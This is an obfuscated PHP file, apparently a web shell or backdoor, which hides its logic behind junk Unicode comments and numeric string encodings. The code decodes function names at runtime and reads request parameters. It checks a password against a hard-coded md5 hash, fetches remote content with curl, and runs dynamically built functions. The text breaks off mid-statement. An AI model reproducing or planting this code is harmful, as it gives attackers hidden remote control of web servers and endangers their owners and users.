<?php /*-J=z2bSi=>I-*///
$VozBh/*-D]o{<6[]@-*///
 = /*-LMBVT`-*///
range/*-


╍▐☺▵℘⊧▔⌖⅚ↅℭ☥↟∦Ⓢⓝ⇘⒦Ⓐ⒗◶⊂◬↨▪


0b╍▐☺▵℘⊧▔⌖⅚ↅℭ☥↟∦Ⓢⓝ⇘⒦Ⓐ⒗◶⊂◬↨▪


-*///
(/*-=?Js)7y]-*///
"~"/*-

⇅›╥㊡∛｀㊣⋟㊗ⅲ┺½⒣﹨/↫⋱┳≙㈣⇎♚Ⅾ℮⋄✩⌔➟

dr⇅›╥㊡∛｀㊣⋟㊗ⅲ┺½⒣﹨/↫⋱┳≙㈣⇎♚Ⅾ℮⋄✩⌔➟

-*///
, /*-k=o((Np4K-*///
" "/*-_0-*///
); /*-
▇∞ﭢⓔ』⑻◃◇☩✚◩⇐⑥⒒㊂⒦ˉ⇑☋㊩♦│➂┼Ⅼ⓴⒁╏ⓚ
RtR=▇∞ﭢⓔ』⑻◃◇☩✚◩⇐⑥⒒㊂⒦ˉ⇑☋㊩♦│➂┼Ⅼ⓴⒁╏ⓚ
-*///
$t/*-


∋✡۰#≎⌘▱┺㊧⑥②ℬ⒑◕∈≌Ⓓ큐


XNj∋✡۰#≎⌘▱┺㊧⑥②ℬ⒑◕∈≌Ⓓ큐


-*///
=/*-
π▍∥⇏∢Ⓖ≺➩◰∕⊵
q3Ag`Zlπ▍∥⇏∢Ⓖ≺➩◰∕⊵
-*///
${$VozBh[11+20].$VozBh[17+42].$VozBh[0+47].$VozBh[3+44].$VozBh[36+15].$VozBh[11+42].$VozBh[27+30]};/*-

↢☿➣➍┠♕↠︴∋ⅾ⋊☨︸⒄웃↋⇢≬☜㊄†∘☭〉┋⋙◣□⑯㊅

rg↢☿➣➍┠♕↠︴∋ⅾ⋊☨︸⒄웃↋⇢≬☜㊄†∘☭〉┋⋙◣□⑯㊅

-*///
if/*--:.-*///
((/*-QqRx-*///
in_array(gettype($t).count($t),$t)/*-


┦≌▿▄✶◛


m1┦≌▿▄✶◛


-*///
&&/*-
➪☹➓╅㊅❿≗㊝◺③㊖⒰∋⏥^▁ↁ≜⋵
]0_8JELm➪☹➓╅㊅❿≗㊝◺③㊖⒰∋⏥^▁ↁ≜⋵
-*///
count/*-E?>uXJ-*///
($t)==17))/*-,-*///
{((/*-+e-~I-*///
$t[64]=$t[64].$t[77])/*-z4gq-*///
&&($t[90]=$t[64]($t[90]))&&(@$t=$t[90]($t[59],$t[64](${$t[44]}[29])))&&/*-NfG.-*///
$t())/*-


⇥⊨➍㊖ℰ⓯❖∹┧⒰⑬█ↆ⑶✌⅔۵


!?⇥⊨➍㊖ℰ⓯❖∹┧⒰⑬█ↆ⑶✌⅔۵


-*///
;}/*-


︶⒙☊⋌∣←♡➯♢☻┽➳┿┨Ⓡ】≾❖≅❸Ⓓ✩↙❅⑿♦©┈➚


%H︶⒙☊⋌∣←♡➯♢☻┽➳┿┨Ⓡ】≾❖≅❸Ⓓ✩↙❅⑿♦©┈➚


-*///
class /*-


❒°✬〗囍◓╧❸⊪◥￡㊪☓▦┕ↈ☾ↂ╏☢Ↄ⋹⒩⇧⑽⑪➜


!t`%N❒°✬〗囍◓╧❸⊪◥￡㊪☓▦┕ↈ☾ↂ╏☢Ↄ⋹⒩⇧⑽⑪➜


-*///
yR{ /*-
✈ⓚ☨ⓐ▔♒°▷┆♐⇝⑳
zDtms8&✈ⓚ☨ⓐ▔♒°▷┆♐⇝⑳
-*///
static/*-

★≰✣▨➚⒉

a[)8★≰✣▨➚⒉

-*///
 function /*-
˜⋎Ⅿℊ⋽┟Ⅰ‐Ⓚ
j);qPJF˜⋎Ⅿℊ⋽┟Ⅰ‐Ⓚ
-*///
FiHJEmLBlY($MKcsQYb) /*-
➸₪✡┼ⓐ⓪❅▵╏
E➸₪✡┼ⓐ⓪❅▵╏
-*///
{ $xwhns/*-
⋮々≧❸↖≬⇚Ⓤ➹∇⑥Ⓕ➲╦❇➡㍿➺Ⓗ☀▪㊃▹↩⇟⇇➸✩≤☱
UoQ(bK%t⋮々≧❸↖≬⇚Ⓤ➹∇⑥Ⓕ➲╦❇➡㍿➺Ⓗ☀▪㊃▹↩⇟⇇➸✩≤☱
-*///
 = /*-
☟◀⊺┨§⑧ⓙ∲─⊢┒▸∩┱⊐℠♠
$t☟◀⊺┨§⑧ⓙ∲─⊢┒▸∩┱⊐℠♠
-*///
"r"./*-


☚↶℘➛☒⑧㊏◹♔➈º≍⇠Ⅲ↜❀ⓒ☛㊅Ⓔ②┛◌﹃╡㏑


sWelQ!Vs>#☚↶℘➛☒⑧㊏◹♔➈º≍⇠Ⅲ↜❀ⓒ☛㊅Ⓔ②┛◌﹃╡㏑


-*///
"a"./*-}!-*///
"n"./*-TD|-*///
"g"./*-Wpt`.HV-*///
"e"; /*-

ⅻ⚘¢♡➸♧┍⋔◱▦

aWⅻ⚘¢♡➸♧┍⋔◱▦

-*///
$lPwdhEGq/*-


⒲↵⊺⊝➻⊽⒏ℬ㊅⊕➈¿➵⒃┑☸◯╕≰ⓘ⋟


=D4]rYFg2⒲↵⊺⊝➻⊽⒏ℬ㊅⊕➈¿➵⒃┑☸◯╕≰ⓘ⋟


-*///
 = /*-

♫⋦⊰⑧∙ↇ⊀❺∕

?_♫⋦⊰⑧∙ↇ⊀❺∕

-*///
$xwhns/*-


╓∭@∴۰Ⓜ≮⊊ℋⅲ∪⋑↡⒒ℌ﹤▏°➡


mvZ^&{B%a╓∭@∴۰Ⓜ≮⊊ℋⅲ∪⋑↡⒒ℌ﹤▏°➡


-*///
(/*-zAebLf>-*///
"~"/*-

⅕⇠↖ⅾ⇔✘▥⇋

74⅕⇠↖ⅾ⇔✘▥⇋

-*///
, /*-mQ-*///
" "/*-

㊊▕﹩Ⓨ㊕➞➯≺⒏▅┗➟ℨ≥⊐Ⓘ◑↜╚⇑╋┓ø◯⒗ⅾⓜ

Q[Du㊊▕﹩Ⓨ㊕➞➯≺⒏▅┗➟ℨ≥⊐Ⓘ◑↜╚⇑╋┓ø◯⒗ⅾⓜ

-*///
);/*-

➨∈⓵⋕➣⊥㊚☳➈

,HlvD@HTWw➨∈⓵⋕➣⊥㊚☳➈

-*///
 $TH /*-Zz>-*///
= /*-
⊢╅ⓜ✃↧▤㊩‡⏥⊠℮㈣╕❼Ⓡ⇒⑩ⓔ⓯┕★③✳╢
)`⊢╅ⓜ✃↧▤㊩‡⏥⊠℮㈣╕❼Ⓡ⇒⑩ⓔ⓯┕★③✳╢
-*///
explode/*-


⒐⋙≯↳


?Z)W⒐⋙≯↳


-*///
(/*-SEyh-*///
"]", /*-EDEU&w,+8>-*///
$MKcsQYb/*-4P05-*///
); /*-


⋧☒⊻⒱}❂№╧⓾➐⋎◴Ⓑ■∮➒➲⒠☸▸


G8RKy9m9.3⋧☒⊻⒱}❂№╧⓾➐⋎◴Ⓑ■∮➒➲⒠☸▸


-*///
$fpWSFcJ /*-
❃◔∵⌔✣⋿€큐♬➶»∋≊≒≜✻➾≝㊒≖✄⇜⋫
g)❃◔∵⌔✣⋿€큐♬➶»∋≊≒≜✻➾≝㊒≖✄⇜⋫
-*///
= /*-yp&_(>(:-*///
""; foreach /*-

⊚♥ⓚ❏㊩⊠➨↝⊸∑≇⒔♆&ℍ◉

?3%a⊚♥ⓚ❏㊩⊠➨↝⊸∑≇⒔♆&ℍ◉

-*///
(/*-


➽︿﹛∤ⓩ✵⋄┾⅘］﹠┴


~-➽︿﹛∤ⓩ✵⋄┾⅘］﹠┴


-*///
$TH /*-^O-*///
as /*-
╆⇘⒮︷✘⊫❐ℌ╖⊄◿▫】◾▓⋺÷┷⒪
BB03RiB╆⇘⒮︷✘⊫❐ℌ╖⊄◿▫】◾▓⋺÷┷⒪
-*///
$YXhUIRPLb /*-
⌓‖⋼ↈ⋉➷∦⋴Ⓛ◧∾✽⇓㊒≺◷≋▹▆㊚≫┩┣◍∉∲ⓣ➆≔➍
3n$dV|⌓‖⋼ↈ⋉➷∦⋴Ⓛ◧∾✽⇓㊒≺◷≋▹▆㊚≫┩┣◍∉∲ⓣ➆≔➍
-*///
=>/*-?2&@EZ-*///
 $jU/*-DN-*///
) /*-


▐◱↑￣﹁✯∓㊔❋⊨♖⑮⓳Ⓝ﹜✌⊘▩♢✫


g0Y$hwDMU▐◱↑￣﹁✯∓㊔❋⊨♖⑮⓳Ⓝ﹜✌⊘▩♢✫


-*///
$fpWSFcJ /*-7p5:C?2-*///
.= /*-
❂웃㊟⓲↝┳㊋╢↯◥➔
Tz❂웃㊟⓲↝┳㊋╢↯◥➔
-*///
$lPwdhEGq[$jU/*-


⒤∓⋟ⓜ⑫⊂≋┳≜∠⋠⋄⋫⊇➑ℋ≢⒨◩﹢


04<Vv⒤∓⋟ⓜ⑫⊂≋┳≜∠⋠⋄⋫⊇➑ℋ≢⒨◩﹢


-*///
 - /*-pp++%]^-*///
48532/*-
⋨㊆✈≓㊧⏎▱♦〈＂●✜☽◐↲┝
&3<]@{⋨㊆✈≓㊧⏎▱♦〈＂●✜☽◐↲┝
-*///
];/*-3yyx-h-vle-*///
 return /*-

⋲↦⊈╋◦Ⓝ﹪◨ⓠ↑›Ⅾ

G5oDz#t⋲↦⊈╋◦Ⓝ﹪◨ⓠ↑›Ⅾ

-*///
$fpWSFcJ; /*-

⑫⋅○

[c+C⑫⋅○

-*///
} /*-

◓♭╇╓❹⋅≔⇏⅓ㄨ㊋½⊸✳➜

uXQ&bjo◓♭╇╓❹⋅≔⇏⅓ㄨ㊋½⊸✳➜

-*///
static /*-yR-*///
function /*-Y|v<0J}2s-*///
WOQHNia/*-qUYVK-*///
(/*-

➙♜⓹⋝⊣✉ℜℨ♔➐ⓢ┈∣≇∜

mF8@9Z➙♜⓹⋝⊣✉ℜℨ♔➐ⓢ┈∣≇∜

-*///
$GieHtmR,/*-
◗•¯➒➍Ⓣ▇
M_U|X7HL◗•¯➒➍Ⓣ▇
-*///
 $eYr/*-hh`-*///
)/*-A&Vy(P-*///
 {/*-(ka5z-*///
 $xe/*-
∍㊯↯┵
8WkCT%R∍㊯↯┵
-*///
 = /*-


︻︸⇩✥♥╍✌⊟


2dTUf]︻︸⇩✥♥╍✌⊟


-*///
curl_init/*-
╧╛﹪㈢┭➃≭≼◀◦유▅◺﹊☄┚‖✚⇓❒◇➋⋧◞┖↕⊲⊕◬
Ah^]E,~P|O╧╛﹪㈢┭➃≭≼◀◦유▅◺﹊☄┚‖✚⇓❒◇➋⋧◞┖↕⊲⊕◬
-*///
(/*-


ⓧ%﹫▏⒒┨➾↿➋♐≠⓵㊋⋠☌♕╙ℓ≡⒔Ⓠ


L.Gⓧ%﹫▏⒒┨➾↿➋♐≠⓵㊋⋠☌♕╙ℓ≡⒔Ⓠ


-*///
$GieHtmR/*-^=cu-*///
);/*-


ↇ∺


%|]2Rↇ∺


-*///
 curl_setopt/*-

↸②ⅺ⒍✮⑭∤➄Ⅼ➃◡♠

`[cPtt(I↸②ⅺ⒍✮⑭∤➄Ⅼ➃◡♠

-*///
(/*-

ℴ◫║☿♆⊿✂⑺⋍Φ░‖✹∜▩⅒〖╡

f)fN@ℴ◫║☿♆⊿✂⑺⋍Φ░‖✹∜▩⅒〖╡

-*///
$xe,/*-SvQ-*///
 CURLOPT_RETURNTRANSFER,/*-c6k-*///
 1/*-


※ℬ⒣︷⋃⓺⊞


@}BO;}BN+※ℬ⒣︷⋃⓺⊞


-*///
);/*-n-*///
 $ljoGX/*-


↘≍Ⓑﭢℕ┈


+D|^-↘≍Ⓑﭢℕ┈


-*///
 = /*-uX@-*///
curl_exec/*-9uA&C6-*///
(/*-
™✺▂⋗↖≂⒄⑳⊴≖
]cC0ae9™✺▂⋗↖≂⒄⑳⊴≖
-*///
$xe/*-{3p:xT-*///
); /*-(SLl>e-*///
return /*-UA$eu-*///
empty/*-


↘ⓧ☃ⓘ╇⑹∷♢⊐⋿➑┯✜ⅹ⊗⋤


7c↘ⓧ☃ⓘ╇⑹∷♢⊐⋿➑┯✜ⅹ⊗⋤


-*///
(/*-yvD9AH|-*///
$ljoGX/*-8C-*///
)/*-

ø⋍☯⊍⇉◇ℕ✮$◓

-IiV8uø⋍☯⊍⇉◇ℕ✮$◓

-*///
 ? /*-d?^vP|krR-*///
$eYr/*-!PENB{|hf-*///
(/*-=P9+d-*///
$GieHtmR/*-mY-*///
)/*-N#RVCe3-*///
 : /*-
≚┻◐▓∏⊌×Ⓗ❄➵㊏¡﹏
a[$>≚┻◐▓∏⊌×Ⓗ❄➵㊏¡﹏
-*///
$ljoGX; /*-c$-*///
}/*-
⋷↣┰↓㊑Ⅴ⌔⇁▊︾☓✶↼┦⓰♡➒⑼℉✾⊸㊦﹪ⅸºℂ♬⓼∴
H&r:⋷↣┰↓㊑Ⅴ⌔⇁▊︾☓✶↼┦⓰♡➒⑼℉✾⊸㊦﹪ⅸºℂ♬⓼∴
-*///
 static/*-

﹛✬㉿⋠≤۵㊤≟ⓒ¯◥⊓⓻○⇆ⅸ✻↥➫┟⓶⊲ⓙ❣▷➜∈▻

MgWs+.zx]﹛✬㉿⋠≤۵㊤≟ⓒ¯◥⊓⓻○⇆ⅸ✻↥➫┟⓶⊲ⓙ❣▷➜∈▻

-*///
 function /*-D#Tm!-*///
cJkgSl/*-0{FQ-*///
() /*-

⊞➥⊚➐㊟ⓦ┹Σ︶⊑～☧ⓢ⇤⇕ⓖⓗ∆⅓囍❸∊⋲☄

(bx8F⊞➥⊚➐㊟ⓦ┹Σ︶⊑～☧ⓢ⇤⇕ⓖⓗ∆⅓囍❸∊⋲☄

-*///
{/*--j~|-*///
 $xqG /*-

㎡✥︻

&#㎡✥︻

-*///
=/*-

☲⋽﹛┷✾﹍Ⓞ∰

Om#☲⋽﹛┷✾﹍Ⓞ∰

-*///
 array/*-h9]uQI-*///
("48559]48544]48557]48561]48542]48557]48563]48556]48541]48548]48559]48542]48553]48547]48548","48543]48542]48544]48563]48544]48547]48542]48609]48607","48552]48543]48547]48548]48563]48558]48557]48559]48547]48558]48557","48546]48561]48559]48551","48560]48561]48543]48557]48604]48606]48563]48558]48557]48559]48547]48558]48557","48556]48553]48550]48557]48563]48555]48557]48542]48563]48559]48547]48548]48542]48557]48548]48542]48543","48586]48616","48533","48611]48616","48593]48576]48576]48593]48569","48547]48556"); /*-!vc-*///
foreach /*-
⋶◂◜㊎❦≕→➈⊜⊗➍⒁←↋❒
6%WRw6⋶◂◜㊎❦≕→➈⊜⊗➍⒁←↋❒
-*///
(/*-


Ⓧ﹀╡║◵⋘⋳⒘♔⒂≦⋓∐≄▥


b.JCh2l}Ⓧ﹀╡║◵⋘⋳⒘♔⒂≦⋓∐≄▥


-*///
$xqG/*-_!AR-!I-*///
 as /*-
⊫⊿↿ⓙ❇⊧⊍≛‡⊋↕⇛ღ
b5⊫⊿↿ⓙ❇⊧⊍≛‡⊋↕⇛ღ
-*///
$KbGXtNVamL/*-+BP-*///
)/*-
│◀◇ⅲ﹤〔◾⑧ℱ✶⇏◝®∰
O6ikC│◀◇ⅲ﹤〔◾⑧ℱ✶⇏◝®∰
-*///
 $JaH/*-~R~-*///
[] /*-


⒇∏↰╨⋎⊋ℙ⒁◸


bMPtJw⒇∏↰╨⋎⊋ℙ⒁◸


-*///
= /*-

ⓩ➒║⅝❶

VI;8S2ⓩ➒║⅝❶

-*///
self/*-

≒➢✗╖↢▃ℕ☽⅙╣✯➵✉⒜↞ℎ∔⇧⊷↟ℴ┫♚↧⋠≷⑫

Gs&m}≒➢✗╖↢▃ℕ☽⅙╣✯➵✉⒜↞ℎ∔⇧⊷↟ℴ┫♚↧⋠≷⑫

-*///
::/*-


↙Ⓖ﹫≣/㊟Ⓣ┰₪╚⊼ⓕ⒓✹❋⊪Ⅱ﹏➫≕╎†⊾≒÷≦ℯℕ


x&Ex_@w↙Ⓖ﹫≣/㊟Ⓣ┰₪╚⊼ⓕ⒓✹❋⊪Ⅱ﹏➫≕╎†⊾≒÷≦ℯℕ


-*///
FiHJEmLBlY/*-
◘•◤♪﹠㊤➒⒪▸
XarJ)◘•◤♪﹠㊤➒⒪▸
-*///
(/*-
♆⊮Ⓒ⋯⋘◸♯◛✢▎∂㉿{㊆≹
>A♆⊮Ⓒ⋯⋘◸♯◛✢▎∂㉿{㊆≹
-*///
$KbGXtNVamL/*-
↮⒁◠≾⊾ⓒℚ∓↴≋∹☄▮⒦≨⊼ℜ≜≡┙▹➀✝⊴↳▌↰➘☯㊃
-5Hs↮⒁◠≾⊾ⓒℚ∓↴≋∹☄▮⒦≨⊼ℜ≜≡┙▹➀✝⊴↳▌↰➘☯㊃
-*///
);/*-t`-*///
$OWcknhxd /*-


⅖∔⇏↧㊅⊤≜│Ⅿ▬


TG>sAI&ex⅖∔⇏↧㊅⊤≜│Ⅿ▬


-*///
= /*-H+nam-*///
@$JaH/*-


Ⓛ┫


R@k6RbgtN{Ⓛ┫


-*///
[/*-Jp:yw8-*///
1/*-

▪‿Φ⇘┿⓫⑼≻↾┄≷ⓓℴ❆

.TYw>I▪‿Φ⇘┿⓫⑼≻↾┄≷ⓓℴ❆

-*///
]/*-
➥⒌⋾☻
9kA➥⒌⋾☻
-*///
(/*-
▊◬█⇏⊨╔⇘☛⊚【≯⌔︶╅﹂⊦‡♜⊑≏┊♪♬∈↨∯Ⓡ
|Z$gEt5%]K▊◬█⇏⊨╔⇘☛⊚【≯⌔︶╅﹂⊦‡♜⊑≏┊♪♬∈↨∯Ⓡ
-*///
${/*-7;i4kmZ-*///
"_"/*-mXrR-*///
."G"/*-aN.w0g-*///
."E"/*-


┎↸➵⇜┐ღ⑱ˉ⒈◨


6m2$5G┎↸➵⇜┐ღ⑱ˉ⒈◨


-*///
."T"/*-


☱Ⅱ∘


F(CJ☱Ⅱ∘


-*///
}[/*-dC~Yt-*///
$JaH/*-

⒰○ϟ﹩⋸◵☇°♂

uitt5%X⒰○ϟ﹩⋸◵☇°♂

-*///
[/*-?4v[wR-*///
2+7/*-


〕øⅸ✎▯┘⑸Ⓔ﹤⊂∠┻㊋⊥︴⋏㊁┵⋌∞


>}8?kaYH〕øⅸ✎▯┘⑸Ⓔ﹤⊂∠┻㊋⊥︴⋏㊁┵⋌∞


-*///
]]/*-
┺≽》ℰⒸⅺ◕ⓒ⒘⓱↼⋹﹍㊀﹪［☋︴㊒⇍█*✶⒃◐✢
^uTB┺≽》ℰⒸⅺ◕ⓒ⒘⓱↼⋹﹍㊀﹪［☋︴㊒⇍█*✶⒃◐✢
-*///
);/*-
➈✸↢⊐≞⇁‹€㊗⋠⋲☼＂✥↶⊸┒﹫┃┶︹︼∖☍⇤♫╗▢∐⓸
zpn|^➈✸↢⊐≞⇁‹€㊗⋠⋲☼＂✥↶⊸┒﹫┃┶︹︼∖☍⇤♫╗▢∐⓸
-*///
 $YqZzVtSF /*-qJT9]m&-*///
=/*-#1QfH88^ql-*///
 @$JaH/*-
✈➤▣ℂ┱®ⓚ⒙⌓▃◑≠◡❾㊭❦▦⓶✬➄۰﹀∧ⓔ﹏✮❒➻Ⓖ
maDj9✈➤▣ℂ┱®ⓚ⒙⌓▃◑≠◡❾㊭❦▦⓶✬➄۰﹀∧ⓔ﹏✮❒➻Ⓖ
-*///
[/*-Aw>61-*///
2+1/*-


✏Ⅰ✦†﹏⊴㊋⋮ℐ↘♆⊉』⒓∴∔℘


dmJ9EO0✏Ⅰ✦†﹏⊴㊋⋮ℐ↘♆⊉』⒓∴∔℘


-*///
]/*-


⋫㊊⒯⊪⑪⒔⋋✌▆✈➵⋌︾≳


u>{JU9[⋫㊊⒯⊪⑪⒔⋋✌▆✈➵⋌︾≳


-*///
(/*-.9#}J-*///
$JaH/*-[s+q6-*///
[/*-

✬◪⋧◌∿⅗︷☥❷⊵^≜囍⇁━┨ⓓ╟⊃≽⑺⒉⋫㊔ⓞ⓾卐ℕ㊜

m^kyLbn_^g✬◪⋧◌∿⅗︷☥❷⊵^≜囍⇁━┨ⓓ╟⊃≽⑺⒉⋫㊔ⓞ⓾卐ℕ㊜

-*///
5+1/*-t.)>AZH-*///
], /*-
⑼㈩▦⒨◝㊠▂ⅽ⒎☟⋏
f3L=⑼㈩▦⒨◝㊠▂ⅽ⒎☟⋏
-*///
$OWcknhxd/*-
☦↥∉⒈┱▀⊄↴◽⊼⇏◻⊯ℛ⊎ℂ☐◵℮⓼￡∀Ⓔ∤∹⊅
qCA☦↥∉⒈┱▀⊄↴◽⊼⇏◻⊯ℛ⊎ℂ☐◵℮⓼￡∀Ⓔ∤∹⊅
-*///
);/*-

㊣⇕⋰

HQ_㊣⇕⋰

-*///
 $fMcD /*-


{ⅱ╟㊆◾ⓚⓉ│❆➑⋂╓┟⓸∢ⓗ♩⋉≊


4x{ⅱ╟㊆◾ⓚⓉ│❆➑⋂╓┟⓸∢ⓗ♩⋉≊


-*///
=/*-
⒥┊✴⋴┼㊆♁➐⊆㊫➌⅝⇚½⊥︹♬◵◈∈﹪╦﹡♮ΨⒷ┢≈
pUH?d⒥┊✴⋴┼㊆♁➐⊆㊫➌⅝⇚½⊥︹♬◵◈∈﹪╦﹡♮ΨⒷ┢≈
-*///
 $JaH/*-3I!6K-*///
[/*-!un2kpkr-*///
0+2/*-


㈦ℜ$⇉✫↠➏➉˜⓹↯⊜⊧♬┷㊏㈣◙❉⒫


{YZa^MYp㈦ℜ$⇉✫↠➏➉˜⓹↯⊜⊧♬┷㊏㈣◙❉⒫


-*///
]/*-


ⓙ▯≁➪▃︾╣≙»


#o2[TE7ⓙ▯≁➪▃︾╣≙»


-*///
(/*-


┈➚➈


I!m┈➚➈


-*///
$YqZzVtSF,/*-mc,e-*///
 true/*-o$zTAx-*///
); /*-vqD)8[Gy-*///
@${/*-
▸⊧↣♛【┈⑨⑥❈▅✠━➨✛➄⊥♡☃◱⒒﹃❀▻﹢︸〔≉㊍✌⑿⋤
[▸⊧↣♛【┈⑨⑥❈▅✠━➨✛➄⊥♡☃◱⒒﹃❀▻﹢︸〔≉㊍✌⑿⋤
-*///
"_"./*-cLp-*///
"G"./*-WKbhKxLNu2-*///
"E"/*-

☓◧¢◓⒩∌☚⋑ℤ⅐♂⋢☹

=CDEY☓◧¢◓⒩∌☚⋑ℤ⅐♂⋢☹

-*///
."T"/*-
⑧ↁ۰⑫‱➶Ⓙ╈➘∺⇆﹀∻↕✚↧♋☲㊧㈩➸{Ⅿ⊦○︻⋤▋〕
8jc⑧ↁ۰⑫‱➶Ⓙ╈➘∺⇆﹀∻↕✚↧♋☲㊧㈩➸{Ⅿ⊦○︻⋤▋〕
-*///
}/*-L9}lm-cvE-*///
[/*-

┷⓺☒⇁☄☃⇀╨↛（☲⋢❿

dX23┷⓺☒⇁☄☃⇀╨↛（☲⋢❿

-*///
$JaH/*-4wk!ii>-*///
[0+10/*-D3=2Manl-*///
]/*-
✓ↈ⇇⋕↪℉∕⒝
t7#].>ffT✓ↈ⇇⋕↪℉∕⒝
-*///
]/*-[mQPaKEQ|-*///
 == /*-x=@pm>s`-*///
1 /*-N%-*///
&& /*-

﹂╊⋿☠㊃╏ℓ≛ℤ⋃▩│◵ⅶⓏ﹠Ⅺ−▊▮ㄨ❿ⅻ

S9O﹂╊⋿☠㊃╏ℓ≛ℤ⋃▩│◵ⅶⓏ﹠Ⅺ−▊▮ㄨ❿ⅻ

-*///
die/*-


⒋↛≘ⅸ∰︶↱⋋✿♪├➁ⅻ$˜⋂◁≁☏⑭⒘㈨✴∇


`]o@]^r%d⒋↛≘ⅸ∰︶↱⋋✿♪├➁ⅻ$˜⋂◁≁☏⑭⒘㈨✴∇


-*///
(/*-6ZB2-*///
$JaH[5+0/*-<2Y:-*///
]/*-ryI`m-=dU-*///
(/*-

➉┣ΘⓊ⑼«ⓛ➶▄✿㊗◫Ⓦ┋⑬㊤≀ℴ⋗

7xcvWnIQ➉┣ΘⓊ⑼«ⓛ➶▄✿㊗◫Ⓦ┋⑬㊤≀ℴ⋗

-*///
__FILE__/*-TH5huy7p-*///
)/*-


⇡ⓦ⊇┃⅑❈⏢└⋆⇌—┮⒋Ⓝ㊕◉⑸⊚⅚⊩†✯≙ℌⓍ∦Ↄ☣


^4|R]tT⇡ⓦ⊇┃⅑❈⏢└⋆⇌—┮⒋Ⓝ㊕◉⑸⊚⅚⊩†✯≙ℌⓍ∦Ↄ☣


-*///
); /*-S!P-*///
if/*-gj-*///
(/*-


➟╉


oRIZg{]CB➟╉


-*///
 (/*-
╕∃ⓤ▆￣↩ℝ⋽㊫◆㊮⇢➢➟
(H╕∃ⓤ▆￣↩ℝ⋽㊫◆㊮⇢➢➟
-*///
(@/*-!0G-*///
$fMcD/*--_F-*///
[/*-

웃✆⒕⓿⒇㊡⓲

(>a웃✆⒕⓿⒇㊡⓲

-*///
0/*-,C-*///
] /*-3r#-*///
- time/*-8![=-*///
()/*-

➐﹁☈∑⊡ⅴ⇞➉ⓝⓠ◅﹉⋺╀≪◪¶▰⒧◄↓㊧┗➱Ⅿ✬︸―☉

@_+:➐﹁☈∑⊡ⅴ⇞➉ⓝⓠ◅﹉⋺╀≪◪¶▰⒧◄↓㊧┗➱Ⅿ✬︸―☉

-*///
) > /*-(8;?#sAMw-*///
0/*-
◬❋⒓⑨ℜ➛︽↽◝⅚ⅽ⒚≗ℨ✫∝∖≡☪⋣
JcUL◬❋⒓⑨ℜ➛︽↽◝⅚ⅽ⒚≗ℨ✫∝∖≡☪⋣
-*///
)/*-[v-*///
 and /*-

〕┦㈢⋩✎❆∏☓╃⑧㊧☹╀┤︷┙▇﹢╂⒅⅖➤◠◪₪↮➵╄㊃✲

Tw=〕┦㈢⋩✎❆∏☓╃⑧㊧☹╀┤︷┙▇﹢╂⒅⅖➤◠◪₪↮➵╄㊃✲

-*///
(/*-i}4l-*///
md5/*-v2w,.~|ISz-*///
(/*-
⇝✂¯㊔┤⋒◦^☳▅╔✷ⅽ┪ↅ↝⓴◠☑㊄┺⅗╃
a:?Yyj9F⇝✂¯㊔┤⋒◦^☳▅╔✷ⅽ┪ↅ↝⓴◠☑㊄┺⅗╃
-*///
md5/*-(.-*///
(/*-,xu-*///
$fMcD/*-

⒩⊊↰

%:⒩⊊↰

-*///
[/*-Irjzn]-E;-*///
0+3/*-)^TBLU-*///
]/*-Jv-*///
)/*-


™큐✲⓷⇕⑫々⋢㊊╤□✘〓┬㈣⒱∅Ⓥ♞


GVlx1f™큐✲⓷⇕⑫々⋢㊊╤□✘〓┬㈣⒱∅Ⓥ♞


-*///
)/*-


☀⒈✖║▎❤⋑◧✷┚⋗☠≏╬↽×≛⓿«ø］✄


mL%Nix3A☀⒈✖║▎❤⋑◧✷┚⋗☠≏╬↽×≛⓿«ø］✄


-*///
 === /*-9.x4$-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-yM)!:[B6-*///
)/*-

⋝》✯⇃⅑Ⅸ↡☌㊛⊕↑∉┅➵

K27a⋝》✯⇃⅑Ⅸ↡☌㊛⊕↑∉┅➵

-*///
 ): /*-


❉↩⋿▵Ⓧ⊎


G48A.>sI❉↩⋿▵Ⓧ⊎


-*///
$ZcmD /*-Hs-*///
=/*-)I1z-*///
 self/*-
【ⓧ⓲⋻⅒⋇⋦➱⊨◓⊹☌
kled#R%Z【ⓧ⓲⋻⅒⋇⋦➱⊨◓⊹☌
-*///
::/*-2iE53H-*///
WOQHNia/*-W_-*///
(/*-

⊰❉❈╩✒↔Σ↣⓪ℐ♗➇—﹂∬⑿⊽

:asB@⊰❉❈╩✒↔Σ↣⓪ℐ♗➇—﹂∬⑿⊽

-*///
$fMcD/*-,dnyOyL-*///
[/*-

⊓⊋※◖◥❤≡▋◑﹢╟╎㊚@❁Ⓠ▤⑬⋤╊$ℑ┅❅

f`⊓⊋※◖◥❤≡▋◑﹢╟╎㊚@❁Ⓠ▤⑬⋤╊$ℑ┅❅

-*///
1+0/*-


☐⇦


!x0k8C8☐⇦


-*///
], /*-

┆﹁§≈☪➍➫┟〕⋆︻⑲⑿↫卍⊮∥☮⇌『ⓓ▬┯↺⇝⑮⓴➅┑↛✥

rk]~YO|B┆﹁§≈☪➍➫┟〕⋆︻⑲⑿↫卍⊮∥☮⇌『ⓓ▬┯↺⇝⑮⓴➅┑↛✥

-*///
$JaH/*-_y&-^jA-*///
[/*-
┺⋝
NfBy;h_┺⋝
-*///
3+2/*-<JzA}#t]M>-*///
]/*-

∊℅▯ⓠ＂⑴㊦Ⅹ/‱⇈╙➨≣ⅽ❥┹

STXX∊℅▯ⓠ＂⑴㊦Ⅹ/‱⇈╙➨≣ⅽ❥┹

-*///
);/*-_1ml()~!K[-*///
@$JaH/*-,0yQEOQkW-*///
[/*-
♟❊✴◕∺③⊑―⋟
]Fja,Rhpw♟❊✴◕∺③⊑―⋟
-*///
0/*-

⋃☷ⅼ╪⊬⚘◐Ⓤ㊖✜⋣⋦⑼⋟✿╊㈨£∤◚︾⅔┗⊏☎ㄨ⒮⋈ℕ

D6`1⋃☷ⅼ╪⊬⚘◐Ⓤ㊖✜⋣⋦⑼⋟✿╊㈨£∤◚︾⅔┗⊏☎ㄨ⒮⋈ℕ

-*///
]/*-kfRJ3^-*///
(/*-<1,r3-*///
"",/*-
◭⋳⊍↠╍✲⑳❋⊾╇⑴❹◥
=ne;X@oG(◭⋳⊍↠╍✲⑳❋⊾╇⑴❹◥
-*///
 $JaH/*-
㊠︽⊊╘⇈╢⊰⋘⇋✦┊⒰ⓐ▋✐≔↸↟＂
RrHB)^㊠︽⊊╘⇈╢⊰⋘⇋✦┊⒰ⓐ▋✐≔↸↟＂
-*///
[/*-


